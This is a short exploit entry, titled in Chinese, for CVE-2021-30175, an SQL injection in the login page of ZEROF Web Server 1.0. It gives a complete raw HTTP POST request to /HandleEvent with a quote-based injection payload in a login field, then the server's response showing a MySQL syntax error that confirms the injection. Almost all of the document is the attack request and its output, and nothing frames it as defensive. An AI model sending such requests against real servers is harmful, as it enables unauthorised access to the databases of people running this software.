CVE-2021-30175_ZEROF_Web_Server_1.0_(April_2021_version)_登錄頁面SQL注入漏洞

# CVE-2021-30175 ZEROF Web Server 1.0 (April 2021 version) 登錄頁面SQL注入漏洞
==EXP==

POST /HandleEvent HTTP/1.1
Host: zerof
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126

Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff"&_seq_=2&_uo_=O

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209
Date: Wed, 07 Apr 2021 10:33:44 GMT
Server: ZEROF Web Server

try{_rsov_(O33,0);_rsov_(O37,0);}finally{alert("#42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1.");}